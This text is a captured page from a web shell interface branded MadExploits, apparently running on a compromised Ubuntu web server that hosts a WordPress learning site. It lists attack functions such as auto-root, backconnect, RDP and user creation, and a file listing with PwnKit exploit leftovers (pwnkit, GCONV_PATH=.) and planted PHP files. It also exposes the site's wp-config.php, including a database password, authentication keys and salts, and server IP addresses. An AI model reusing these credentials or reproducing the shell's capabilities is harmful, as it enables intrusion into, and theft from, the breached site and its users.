Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 3.129.70.138
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxrwxrwx
wp-content
[ DIR ]
drwxrwxrwx
wp-dhoom
[ DIR ]
drwxr-xr-x
wp-file
[ DIR ]
drwxr-xr-x
wp-files
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxrwxrwx
.htaccess
252
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
googlec9019d128b9c9a90.html
53
B
-rw-r--r--
license.txt
19.45
KB
-rwxrwxrwx
okta.php
12.29
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
wp-activate.php
7.04
KB
-rwxrwxrwx
wp-blog-header.php
351
B
-rwxrwxrwx
wp-clone.php
62.7
KB
-rw-r--r--
wp-comments-post.php
2.28
KB
-rwxrwxrwx
wp-config-sample.php
2.94
KB
-rwxrwxrwx
wp-config.php
3.22
KB
-rwxrwxrwx
wp-cron.php
5.41
KB
-rwxrwxrwx
wp-links-opml.php
2.44
KB
-rwxrwxrwx
wp-load.php
3.7
KB
-rwxrwxrwx
wp-login.php
48.17
KB
-rwxrwxrwx
wp-mail.php
8.34
KB
-rwxrwxrwx
wp-promax.php
61.12
KB
-r--r--r--
wp-settings.php
24.41
KB
-rwxrwxrwx
wp-signup.php
33.54
KB
-rwxrwxrwx
wp-trackback.php
4.77
KB
-rwxrwxrwx
xmlrpc.php
3.16
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/documentation/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'lmsnewdb' ); /** Database username */ define( 'DB_USER', 'stageuser' ); /** Database password */ define( 'DB_PASSWORD', 'U7^nGFvd$3@v!' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', ' :V[.pp{mv.m)GiPB@3 Xte#J_KXETpxh{#Fm8<|>/)|E#D df;G9v%{2O);w#Ic' ); define( 'SECURE_AUTH_KEY', '?*tO`?SSjX9%r(!*!%,}`/,3q<Q)hZECM9+e[&jsBZqegv,;g[Ru1u!cS{BhH#%C' ); define( 'LOGGED_IN_KEY', 'UAuH=#|oduMZr7*,QpBZ;#!cv@#gA~=+x;#W~RM%LTS`;u;#0FrT~yJx,x|Y4ls$' ); define( 'NONCE_KEY', '-0.ov/!|F8#toFK)oY2u[1$8%rJm&qnIM;DBRIK6$Wv:F`r^q2enNYgnDuyC*LQg' ); define( 'AUTH_SALT', '5%@HNuB|-C~y+r4]|pscI^yhTTcz,e^XEW;{LA[qHi4{M[Vya9mWYMZe08CpqG3-' ); define( 'SECURE_AUTH_SALT', '9qF%D PtoSC+X`?0C7O!KbuMdy%Hi^JToa:>>lAE|^nDspDm%`9wmzc4ldo&6GBq' ); define( 'LOGGED_IN_SALT', '-pz}Jj4Sh_c&PHFH(B-qI{YD!Z2!OoT)*gjW5p+i(c_W7_^7kjyx?Kju1^?yF+4m' ); define( 'NONCE_SALT', '%3--K~e|FvCLWrBJqHO:tg[a$R(/wsT2-Y;!;,Ujal3NL7qle![a_1AC~K9o <lv' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/documentation/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Close